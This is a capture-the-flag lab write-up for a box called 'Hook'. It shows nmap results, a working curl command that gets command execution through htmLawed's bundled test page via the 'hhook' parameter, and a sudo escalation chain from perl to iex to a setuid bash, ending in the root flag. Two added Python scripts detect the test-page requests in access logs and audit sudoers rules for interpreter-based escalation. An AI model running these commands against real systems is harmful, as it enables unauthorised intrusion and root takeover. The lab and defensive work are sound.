# Lab practice
Download: Hook
NAT, IP: 192.168.143
# Penetration process
# Initial information gathering
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.59 (Debian)
| http-robots.txt: 1 disallowed entry
|_/htmLawed
4369/tcp open  epmd    Erlang Port Mapper Daemon
| epmd-info:
|   epmd_port: 4369
|_  nodes:
```
The CMS on port 80 is htmLawed (robots.txt gives away the /htmLawed path). Searched for an EXP and fired it; the library's own test page accepts an `hhook` parameter that it executes:

```
curl -s -d 'sid=foo&hhook=exec&text=这里写CMD' -b 'sid=foo' http://localhost/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
```

Write a small sh script, upload it, run it and you have a shell.
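From the defender's side, the request above leaves a clear trace: on a production host nobody has a reason to touch the library's bundled test page, so any hit on it is a signal. The following is an added example, not code from the writeup or from the htmLawed project: it parses Apache combined-format access-log lines, raises an alert for every request whose path ends in `htmLawedTest.php`, and rates POSTs higher because the `hhook` parameter travels in the body. The log lines, the watched suffix list and the severity scheme are all constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Constructed Apache combined-format access-log lines for demonstration
# (not captured from the lab box). The first four requests mirror the
# recon and exploitation sequence: robots.txt, the disallowed /htmLawed
# path, then the library's own test page.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /robots.txt HTTP/1.1" 200 30 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /htmLawed/ HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 9001 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 200 1403 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The htmLawed test page accepts an hhook parameter and executes it, so any
# request to it on a production host is worth an alert. Matched case-insensitively
# on the path suffix so the vendor copy and a copy under /htmLawed/ are both caught.
WATCHED_SUFFIXES = ("/htmlawedtest.php",)
SEVERITY_RANK = {"medium": 1, "high": 2}

@dataclass(frozen=True)
class Alert:
    ip: str
    timestamp: str
    method: str
    path: str
    severity: str

def scan_access_log(text):
    """Return one Alert per request that touches the watched script."""
    alerts = []
    for line in text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than crash the scan
        path = m["target"].split("?", 1)[0]
        if not path.lower().endswith(WATCHED_SUFFIXES):
            continue
        # The hook parameter travels in the POST body, which the access log
        # does not record, so the method is the strongest signal we have here.
        severity = "high" if m["method"] == "POST" else "medium"
        alerts.append(Alert(m["ip"], m["ts"], m["method"], path, severity))
    return alerts

def worst_severity_by_ip(alerts):
    """Collapse alerts to the highest severity seen per source address."""
    worst = {}
    for a in alerts:
        if SEVERITY_RANK[a.severity] > SEVERITY_RANK.get(worst.get(a.ip), 0):
            worst[a.ip] = a.severity
    return worst

if __name__ == "__main__":
    found = scan_access_log(SAMPLE_ACCESS_LOG)
    for a in found:
        print(f"[{a.severity}] {a.ip} {a.method} {a.path} at {a.timestamp}")
    print(worst_severity_by_ip(found))
```

The real fix is not detection but removal: the test page ships with the library for developers and should be deleted from, or denied in, a deployed vhost; the log scan only tells you who found it before you did.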
# Privilege escalation
Privilege escalation via sudo misuse: www-data may run perl as noname, and noname may run iex as root. Both are interpreters, so each sudo rule is effectively a shell as the target user.
```
www-data@hook:/var/www/html/htmLawed$ sudo -u noname perl -e 'exec "/bin/sh";'
noname@hook:/var/www/html/htmLawed$ sudo iex
Interactive Elixir (1.14.0) - press Ctrl+C to exit (type h() ENTER for help)
iex(1)> System.cmd("sudo",["chmod","+s","/bin/bash"])
{"", 0}
iex(1)> ^C
BREAK: (a)bort (A)bort with dump (c)ontinue (p)roc info (i)nfo
       (l)oaded (v)ersion (k)ill (D)b-tables (d)istribution
a
noname@hook:/var/www/html/htmLawed$ bash -p
bash-5.2# cat /root/root.txt
708883f44e1b0e57c8a501e176fad8a9
```
Done, folks.
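The two-hop chain above is exactly what a sudoers audit should catch before an attacker does. What follows is an added example, not code from the writeup or from the lab: a small parser for the common `user host=(runas) [NOPASSWD:] command` form of sudoers lines, an audit that flags rules granting an interpreter or shell (or `ALL`), and a breadth-first search that strings flagged rules together into an escalation path. The sudoers content is constructed to reproduce the perl -> iex -> root chain; the real `/etc/sudoers` of the box is not shown on the page, and the interpreter list is an assumption that you would extend for your own environment.

```python
import re
from collections import deque
from dataclasses import dataclass

# Constructed sudoers content (assumed; the lab's real /etc/sudoers is not shown
# on the page). The www-data and noname lines are the ones that would produce
# the perl -> iex -> root chain seen in the session above.
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
# User privilege specification
root    ALL=(ALL:ALL) ALL
www-data ALL=(noname) NOPASSWD: /usr/bin/perl
noname  ALL=(root) NOPASSWD: /usr/bin/iex
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app.service, /usr/bin/systemctl status app.service
"""

# user host=(runas[:group]) [TAG:]... commands   (simplified sudoers grammar;
# aliases, Defaults and quoted '#' inside commands are not handled)
RULE_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)'
    r'(?P<cmds>.+)$'
)

# Interpreters and shells: once sudo lets a user run one of these, the
# command restriction is meaningless because they can exec anything.
# Assumed starter list; extend it for the binaries present on your hosts.
COMMAND_RUNNERS = {"sh", "bash", "dash", "zsh", "perl", "python", "python3",
                   "ruby", "iex", "erl", "elixir"}

@dataclass(frozen=True)
class Finding:
    user: str
    runas: str
    command: str
    nopasswd: bool
    reason: str

def parse_rules(text):
    """Return (user, runas_user, command, nopasswd) tuples, one per command."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # sudo runs as root when no runas is given; "(ALL:ALL)" keeps only the user part
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in m["cmds"].split(","):
            rules.append((m["user"], runas, cmd.strip(), nopasswd))
    return rules

def audit(text):
    """Flag rules that hand a non-root user an unrestricted command or an interpreter."""
    findings = []
    for user, runas, cmd, nopasswd in parse_rules(text):
        if user == "root":
            continue
        if cmd == "ALL":
            findings.append(Finding(user, runas, cmd, nopasswd, "unrestricted command list"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in COMMAND_RUNNERS:
            findings.append(Finding(user, runas, cmd, nopasswd,
                                    f"{binary} can execute arbitrary commands as {runas}"))
    return findings

def escalation_path(findings, start, target="root"):
    """Breadth-first search over user -> runas edges built from the findings."""
    edges = {}
    for f in findings:
        edges.setdefault(f.user, set()).add(target if f.runas == "ALL" else f.runas)
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == target:
            return path
        for nxt in sorted(edges.get(path[-1], ())):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

if __name__ == "__main__":
    found = audit(SAMPLE_SUDOERS)
    for f in found:
        print(f"{f.user} -> {f.runas}: {f.command} ({f.reason})")
    print("path from www-data:", escalation_path(found, "www-data"))
```

Running it on the constructed file reports the perl and iex rules and the path `www-data -> noname -> root`, while the rsync and systemctl rules pass the interpreter check; the point of the graph step is that each rule looks harmless on its own, and only the chain shows that the web user is one hop from root.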
# Summary
How do you search for the right exp reliably?